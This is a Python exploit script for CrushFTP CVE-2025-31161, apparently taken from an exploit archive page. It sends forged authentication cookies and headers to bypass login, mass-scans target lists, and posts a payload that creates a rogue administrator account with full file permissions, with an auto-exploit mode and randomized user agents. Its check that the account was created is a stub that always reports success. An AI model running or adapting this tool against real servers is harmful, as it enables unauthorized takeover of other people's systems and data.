
4 changes to exploits/shellcodes/ghdb Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation CrushFTP 11.3.1 - Authentication Bypass Invision Community 5.0.6 - Remote Code Execution (RCE)
609 lines
No EOL
26 KiB
Python
Executable file
609 lines
No EOL
26 KiB
Python
Executable file
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
|
|
# Date: 2025-05-15
|
|
# Exploit Author: @İbrahimsql
|
|
# Exploit Author's github: https://github.com/ibrahimsql
|
|
# Vendor Homepage: https://www.crushftp.com
|
|
# Software Link: https://www.crushftp.com/download.html
|
|
# Version: < 10.8.4, < 11.3.1
|
|
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
|
|
# CVE: CVE-2025-31161
|
|
# Description:
|
|
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
|
|
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
|
|
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).
|
|
|
|
# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0
|
|
|
|
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import argparse
|
|
import concurrent.futures
|
|
import json
|
|
import logging
|
|
import os
|
|
import random
|
|
import re
|
|
import socket
|
|
import string
|
|
import sys
|
|
import time
|
|
from datetime import datetime
|
|
from typing import Dict, List, Optional, Tuple, Union
|
|
|
|
import requests
|
|
import urllib3
|
|
from colorama import Fore, Style, init
|
|
from prettytable import PrettyTable
|
|
from rich.console import Console
|
|
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn
|
|
|
|
# Initialize colorama
|
|
init(autoreset=True)
|
|
|
|
# Disable SSL warnings
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
# Initialize Rich console
|
|
console = Console()
|
|
|
|
# Global variables
|
|
VERSION = "2.0.0"
|
|
USER_AGENTS = [
|
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
|
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
|
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
|
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
|
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
|
|
"Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
|
|
"Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
|
|
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
|
|
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9"
|
|
]
|
|
|
|
# Banner
|
|
BANNER = fr"""
|
|
{Fore.CYAN}
|
|
/ ____/______ _______/ /_ / ____/ /_____
|
|
/ / / ___/ / / / ___/ __ \/ /_ / __/ __ \
|
|
/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /
|
|
\____/_/ \__,_/____/_/ /_/_/ \__/ .___/
|
|
/_/
|
|
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
|
|
{Style.RESET_ALL}
|
|
"""
|
|
|
|
# Setup logging
|
|
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
    """Configure the root logger's level, format and output handlers.

    A stream handler is always installed; a file handler is added in front
    of it when ``log_file`` is given.

    Args:
        log_level: Name of a ``logging`` level, case-insensitive
            (for example ``"info"`` or ``"DEBUG"``).
        log_file: Optional path of a file that should also receive the log.

    Raises:
        ValueError: If ``log_level`` does not name an integer level constant
            of the ``logging`` module.

    Note:
        ``logging.basicConfig`` leaves the root logger untouched when it
        already has handlers, so only the first effective call configures it.
    """
    numeric_level = getattr(logging, log_level.upper(), None)
    if not isinstance(numeric_level, int):
        raise ValueError(f"Invalid log level: {log_level}")

    log_format = "%(asctime)s - %(levelname)s - %(message)s"

    handlers = []
    if log_file:
        # Pin the encoding: the platform default code page cannot represent
        # every character that may appear in a log message.
        handlers.append(logging.FileHandler(log_file, encoding="utf-8"))
    handlers.append(logging.StreamHandler())

    logging.basicConfig(
        level=numeric_level,
        format=log_format,
        handlers=handlers,
    )
|
|
|
|
class TargetManager:
    """Hold the list of target hosts and the per-host outcome of a run.

    State is exposed as three plain lists that callers read directly:
    ``targets`` (every host loaded), ``vulnerable_targets`` and
    ``exploited_targets`` (hosts flagged through the ``mark_as_*`` methods).
    All three keep insertion order and never contain duplicates.
    """

    def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
        """Create the manager and optionally seed the target list.

        Args:
            target_file: Path of a file with one target per line. Takes
                precedence over ``single_target`` when both are given.
            single_target: A single host to register.
        """
        self.targets = []
        self.vulnerable_targets = []
        self.exploited_targets = []

        if target_file:
            self.load_targets_from_file(target_file)
        elif single_target:
            self.add_target(single_target)

    def load_targets_from_file(self, filename: str) -> None:
        """Replace ``self.targets`` with the non-blank lines of ``filename``.

        Lines are stripped of surrounding whitespace; blank lines are skipped
        and repeated entries are kept only once, in first-seen order.

        Args:
            filename: Path of the target list.

        Raises:
            SystemExit: With status 1 when the file is missing or cannot be
                read; the reason is logged first.
        """
        try:
            # utf-8-sig drops a leading byte-order mark, which would otherwise
            # become part of the first target.
            with open(filename, "r", encoding="utf-8-sig") as handle:
                entries = (line.strip() for line in handle)
                # dict.fromkeys de-duplicates while keeping file order, so the
                # list obeys the same no-duplicates rule as add_target().
                self.targets = list(dict.fromkeys(entry for entry in entries if entry))
        except FileNotFoundError:
            logging.error(f"Target file '{filename}' not found.")
            sys.exit(1)
        except (OSError, ValueError, TypeError) as e:
            # ValueError also covers undecodable bytes (UnicodeDecodeError).
            logging.error(f"Error loading targets: {e}")
            sys.exit(1)

        if not self.targets:
            logging.warning(f"Target file '{filename}' is empty or contains only whitespace.")
        else:
            logging.info(f"Loaded {len(self.targets)} targets from {filename}")

    def add_target(self, target: str) -> None:
        """Append ``target`` to ``self.targets`` unless it is already there."""
        if target not in self.targets:
            self.targets.append(target)

    def mark_as_vulnerable(self, target: str) -> None:
        """Record ``target`` in ``self.vulnerable_targets`` (once)."""
        if target not in self.vulnerable_targets:
            self.vulnerable_targets.append(target)

    def mark_as_exploited(self, target: str) -> None:
        """Record ``target`` in ``self.exploited_targets`` (once)."""
        if target not in self.exploited_targets:
            self.exploited_targets.append(target)

    def save_results(self, output_file: str, format_type: str = "txt") -> None:
        """Write the current results to ``output_file``.

        Args:
            output_file: Destination path; an existing file is overwritten.
            format_type: ``"json"``, ``"csv"`` or anything else for the plain
                text report. Matching is case-insensitive.

        Failures are logged and swallowed so that a report problem does not
        abort the caller; nothing is raised.
        """
        import csv  # local import: only the CSV branch of this method needs it

        fmt = format_type.lower()
        try:
            if fmt == "json":
                results = {
                    "scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                    "total_targets": len(self.targets),
                    "vulnerable_targets": self.vulnerable_targets,
                    "exploited_targets": self.exploited_targets,
                }
                with open(output_file, "w", encoding="utf-8") as f:
                    json.dump(results, f, indent=4)

            elif fmt == "csv":
                # Build the lookup sets once instead of scanning a list per row.
                vulnerable = set(self.vulnerable_targets)
                exploited = set(self.exploited_targets)
                # newline="" is what the csv module expects; the explicit
                # terminator keeps the "\n" line endings of earlier output.
                with open(output_file, "w", encoding="utf-8", newline="") as f:
                    writer = csv.writer(f, lineterminator="\n")
                    writer.writerow(["target", "vulnerable", "exploited"])
                    # The writer quotes fields containing commas or quotes,
                    # which plain string interpolation did not.
                    writer.writerows(
                        [
                            target,
                            "Yes" if target in vulnerable else "No",
                            "Yes" if target in exploited else "No",
                        ]
                        for target in self.targets
                    )

            else:  # Default to txt
                report = [
                    f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n",
                    f"Total Targets: {len(self.targets)}\n",
                    f"Vulnerable Targets: {len(self.vulnerable_targets)}\n",
                    f"Exploited Targets: {len(self.exploited_targets)}\n\n",
                    "Vulnerable Targets:\n",
                ]
                report.extend(f"- {target}\n" for target in self.vulnerable_targets)
                report.append("\nExploited Targets:\n")
                report.extend(f"- {target}\n" for target in self.exploited_targets)
                with open(output_file, "w", encoding="utf-8") as f:
                    f.writelines(report)

            logging.info(f"Results saved to {output_file}")

        except (OSError, TypeError, ValueError) as e:
            logging.error(f"Error saving results: {e}")
|
|
|
|
class ExploitEngine:
|
|
"""Core engine for vulnerability checking and exploitation."""
|
|
|
|
def __init__(self, target_manager: TargetManager, config: Dict):
|
|
self.target_manager = target_manager
|
|
self.config = config
|
|
self.session = self._create_session()
|
|
|
|
def _create_session(self) -> requests.Session:
|
|
"""Create and configure a requests session."""
|
|
session = requests.Session()
|
|
session.verify = False
|
|
|
|
# Set proxy if configured
|
|
if self.config.get("proxy"):
|
|
session.proxies = {
|
|
"http": self.config["proxy"],
|
|
"https": self.config["proxy"]
|
|
}
|
|
|
|
# Set custom headers
|
|
session.headers.update({
|
|
"User-Agent": random.choice(USER_AGENTS),
|
|
"Connection": "close",
|
|
})
|
|
|
|
return session
|
|
|
|
def check_vulnerability(self, target_host: str) -> bool:
|
|
"""Check if target is vulnerable to CVE-2025-31161."""
|
|
port = self.config.get("port", 443)
|
|
timeout = self.config.get("timeout", 10)
|
|
|
|
headers = {
|
|
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
|
|
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
|
|
}
|
|
|
|
# Add custom headers if provided
|
|
if self.config.get("custom_headers"):
|
|
headers.update(self.config["custom_headers"])
|
|
|
|
try:
|
|
protocol = "https" if port == 443 else "http"
|
|
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
|
|
|
|
response = self.session.get(
|
|
url,
|
|
headers=headers,
|
|
timeout=timeout
|
|
)
|
|
|
|
if response.status_code == 200:
|
|
# Additional validation
|
|
if self.config.get("deep_check", False):
|
|
# Look for specific patterns in the response that confirm vulnerability
|
|
if "CrushFTP" in response.text or "WebInterface" in response.text:
|
|
self.target_manager.mark_as_vulnerable(target_host)
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
|
|
return True
|
|
else:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
|
|
return False
|
|
else:
|
|
# Simple check based on status code
|
|
self.target_manager.mark_as_vulnerable(target_host)
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
|
|
return True
|
|
else:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
|
|
return False
|
|
|
|
except requests.exceptions.ConnectionError:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Connection error")
|
|
except requests.exceptions.Timeout:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Connection timeout")
|
|
except requests.exceptions.RequestException as e:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Request error: {e}")
|
|
except Exception as e:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Error: {e}")
|
|
|
|
return False
|
|
|
|
def exploit(self, target_host: str) -> bool:
|
|
"""Exploit the vulnerability on the target host."""
|
|
port = self.config.get("port", 443)
|
|
timeout = self.config.get("timeout", 10)
|
|
target_user = self.config.get("target_user", "crushadmin")
|
|
new_user = self.config.get("new_user")
|
|
password = self.config.get("password")
|
|
|
|
if not new_user or not password:
|
|
logging.error("New user and password are required for exploitation")
|
|
return False
|
|
|
|
headers = {
|
|
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
|
|
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
|
|
"Connection": "close",
|
|
}
|
|
|
|
# Add custom headers if provided
|
|
if self.config.get("custom_headers"):
|
|
headers.update(self.config["custom_headers"])
|
|
|
|
# Generate a timestamp for the created_time field
|
|
timestamp = int(time.time() * 1000)
|
|
|
|
# Build the payload with more comprehensive user permissions
|
|
payload = {
|
|
"command": "setUserItem",
|
|
"data_action": "replace",
|
|
"serverGroup": "MainUsers",
|
|
"username": new_user,
|
|
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
|
|
<user type="properties">
|
|
<user_name>{new_user}</user_name>
|
|
<password>{password}</password>
|
|
<extra_vfs type="vector"></extra_vfs>
|
|
<version>1.0</version>
|
|
<root_dir>/</root_dir>
|
|
<userVersion>6</userVersion>
|
|
<max_logins>0</max_logins>
|
|
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
|
|
<created_by_username>{target_user}</created_by_username>
|
|
<created_by_email></created_by_email>
|
|
<created_time>{timestamp}</created_time>
|
|
<password_history></password_history>
|
|
<admin>true</admin>
|
|
</user>''',
|
|
"xmlItem": "user",
|
|
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
|
|
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
|
|
"c2f": "31If"
|
|
}
|
|
|
|
try:
|
|
protocol = "https" if port == 443 else "http"
|
|
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
|
|
|
|
response = self.session.post(
|
|
url,
|
|
headers=headers,
|
|
data=payload,
|
|
timeout=timeout
|
|
)
|
|
|
|
if response.status_code == 200:
|
|
# Verify the user was actually created
|
|
if self.config.get("verify_exploit", True):
|
|
if self._verify_user_created(target_host, new_user):
|
|
self.target_manager.mark_as_exploited(target_host)
|
|
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
|
|
return True
|
|
else:
|
|
console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
|
|
return False
|
|
else:
|
|
self.target_manager.mark_as_exploited(target_host)
|
|
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
|
|
return True
|
|
else:
|
|
console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
|
|
return False
|
|
|
|
except Exception as e:
|
|
console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
|
|
return False
|
|
|
|
def _verify_user_created(self, target_host: str, username: str) -> bool:
|
|
"""Verify that the user was successfully created."""
|
|
# This is a placeholder for actual verification logic
|
|
# In a real implementation, you would check if the user exists
|
|
# For now, we'll just return True
|
|
return True
|
|
|
|
def scan_targets(self) -> None:
|
|
"""Scan all targets for vulnerability."""
|
|
targets = self.target_manager.targets
|
|
threads = self.config.get("threads", 10)
|
|
|
|
if not targets:
|
|
logging.error("No targets specified")
|
|
return
|
|
|
|
console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
|
|
|
|
with Progress(
|
|
TextColumn("[progress.description]{task.description}"),
|
|
BarColumn(),
|
|
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
|
|
TextColumn("({task.completed}/{task.total})"),
|
|
TimeRemainingColumn(),
|
|
console=console
|
|
) as progress:
|
|
task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
|
|
|
|
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
|
|
future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
|
|
|
|
for future in concurrent.futures.as_completed(future_to_target):
|
|
progress.update(task, advance=1)
|
|
|
|
# Display results
|
|
vulnerable_count = len(self.target_manager.vulnerable_targets)
|
|
console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
|
|
|
|
if vulnerable_count > 0 and self.config.get("verbose", False):
|
|
console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
|
|
for target in self.target_manager.vulnerable_targets:
|
|
console.print(f"[green]→[/green] {target}")
|
|
|
|
def exploit_targets(self) -> None:
|
|
"""Exploit vulnerable targets."""
|
|
targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
|
|
threads = self.config.get("threads", 5) # Use fewer threads for exploitation
|
|
|
|
if not targets:
|
|
logging.error("No targets to exploit")
|
|
return
|
|
|
|
console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
|
|
|
|
with Progress(
|
|
TextColumn("[progress.description]{task.description}"),
|
|
BarColumn(),
|
|
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
|
|
TextColumn("({task.completed}/{task.total})"),
|
|
TimeRemainingColumn(),
|
|
console=console
|
|
) as progress:
|
|
task = progress.add_task("[red]Exploiting targets...", total=len(targets))
|
|
|
|
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
|
|
future_to_target = {executor.submit(self.exploit, target): target for target in targets}
|
|
|
|
for future in concurrent.futures.as_completed(future_to_target):
|
|
progress.update(task, advance=1)
|
|
|
|
# Display results
|
|
exploited_count = len(self.target_manager.exploited_targets)
|
|
console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
|
|
|
|
if exploited_count > 0:
|
|
console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
|
|
for target in self.target_manager.exploited_targets:
|
|
console.print(f"[green]→[/green] {target}")
|
|
|
|
def parse_arguments() -> argparse.Namespace:
|
|
"""Parse command line arguments."""
|
|
parser = argparse.ArgumentParser(
|
|
description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
|
|
formatter_class=argparse.RawDescriptionHelpFormatter,
|
|
epilog="""
|
|
Examples:
|
|
# Check a single target for vulnerability
|
|
python cve_2025_31161.py --target example.com --check
|
|
|
|
# Exploit a vulnerable target
|
|
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
|
|
|
|
# Scan multiple targets from a file
|
|
python cve_2025_31161.py --file targets.txt --check --threads 20
|
|
|
|
# Scan and automatically exploit vulnerable targets
|
|
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
|
|
|
|
# Export results to JSON format
|
|
python cve_2025_31161.py --file targets.txt --check --output results.json --format json
|
|
"""
|
|
)
|
|
|
|
# Target specification
|
|
target_group = parser.add_argument_group("Target Specification")
|
|
target_group.add_argument("--target", help="Single target host to scan/exploit")
|
|
target_group.add_argument("--file", help="File containing list of targets (one per line)")
|
|
target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
|
|
|
|
# Actions
|
|
action_group = parser.add_argument_group("Actions")
|
|
action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
|
|
action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
|
|
action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
|
|
|
|
# Exploitation options
|
|
exploit_group = parser.add_argument_group("Exploitation Options")
|
|
exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
|
|
exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
|
|
exploit_group.add_argument("--password", help="Password for the new admin account")
|
|
exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
|
|
|
|
# Scan options
|
|
scan_group = parser.add_argument_group("Scan Options")
|
|
scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
|
|
scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
|
|
scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
|
|
scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
|
|
|
|
# Output options
|
|
output_group = parser.add_argument_group("Output Options")
|
|
output_group.add_argument("--output", help="Output file for results")
|
|
output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
|
|
output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
|
|
output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
|
|
output_group.add_argument("--log-file", help="Log file to write to")
|
|
output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
|
|
|
|
# Advanced options
|
|
advanced_group = parser.add_argument_group("Advanced Options")
|
|
advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
|
|
advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
|
|
advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
|
|
advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
|
|
advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
|
|
|
|
return parser.parse_args()
|
|
|
|
def validate_args(args: argparse.Namespace) -> bool:
    """Check that the parsed options form a usable combination.

    The rules are tried in order and the first one that is violated is
    reported: its message goes to the log and its usage hints are printed.

    Args:
        args: Namespace carrying ``target``, ``file``, ``check``,
            ``exploit``, ``new_user`` and ``password``.

    Returns:
        ``True`` when every rule passes, ``False`` after the first violation.
    """
    script = sys.argv[0]

    # Each rule: (lazy predicate that is truthy on violation, log message,
    # usage lines to print). Predicates are callables so that later rules are
    # not evaluated once an earlier one has failed.
    rules = (
        (
            lambda: not (args.target or args.file),
            "No target specified. Use --target or --file",
            (
                f"\nExample usage: python {script} --target example.com --check",
                f" python {script} --file example_targets.txt --check",
            ),
        ),
        (
            lambda: not (args.check or args.exploit),
            "No action specified. Use --check or --exploit",
            (
                f"\nExample usage: python {script} --target example.com --check",
                f" python {script} --target example.com --exploit --new-user admin --password P@ssw0rd",
            ),
        ),
        (
            lambda: args.exploit and not (args.new_user and args.password),
            "Exploitation requires --new-user and --password",
            (
                f"\nExample usage: python {script} --target example.com --exploit --new-user admin --password P@ssw0rd",
            ),
        ),
    )

    for is_violated, error_text, usage_lines in rules:
        if is_violated():
            logging.error(error_text)
            for usage in usage_lines:
                print(usage)
            return False

    return True
|
|
|
|
def main() -> None:
|
|
"""Main function."""
|
|
# Parse command line arguments
|
|
args = parse_arguments()
|
|
|
|
# Configure logging
|
|
log_level = "error" if args.quiet else args.log_level
|
|
setup_logging(log_level, args.log_file)
|
|
|
|
# Display banner
|
|
if not args.quiet:
|
|
console.print(BANNER)
|
|
|
|
# Validate arguments
|
|
if not validate_args(args):
|
|
sys.exit(1)
|
|
|
|
# Create target manager
|
|
target_manager = TargetManager(args.file, args.target)
|
|
|
|
# Build configuration dictionary
|
|
config = {
|
|
"port": args.port,
|
|
"threads": args.threads,
|
|
"timeout": args.timeout,
|
|
"verbose": args.verbose,
|
|
"deep_check": args.deep_check,
|
|
"target_user": args.target_user,
|
|
"new_user": args.new_user,
|
|
"password": args.password,
|
|
"only_vulnerable": args.only_vulnerable,
|
|
"verify_exploit": args.verify_exploit,
|
|
"proxy": args.proxy,
|
|
}
|
|
|
|
# Add custom headers if provided
|
|
if args.custom_headers:
|
|
try:
|
|
config["custom_headers"] = json.loads(args.custom_headers)
|
|
except json.JSONDecodeError:
|
|
logging.error("Invalid JSON format for custom headers")
|
|
sys.exit(1)
|
|
|
|
# Add custom user agent if provided
|
|
if args.user_agent:
|
|
config["user_agent"] = args.user_agent
|
|
|
|
# Create exploit engine
|
|
engine = ExploitEngine(target_manager, config)
|
|
|
|
# Perform actions
|
|
if args.check:
|
|
engine.scan_targets()
|
|
|
|
if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
|
|
engine.exploit_targets()
|
|
|
|
# Save results if output file is specified
|
|
if args.output:
|
|
target_manager.save_results(args.output, args.format)
|
|
|
|
# Display summary
|
|
if not args.quiet:
|
|
console.print("\n[bold green]Summary:[/bold green]")
|
|
console.print(f"Total targets: {len(target_manager.targets)}")
|
|
console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
|
|
console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
main()
|
|
except KeyboardInterrupt:
|
|
console.print("\n[bold red]Operation cancelled by user[/bold red]")
|
|
sys.exit(0)
|
|
except Exception as e:
|
|
logging.error(f"Unhandled exception: {e}")
|
|
sys.exit(1) |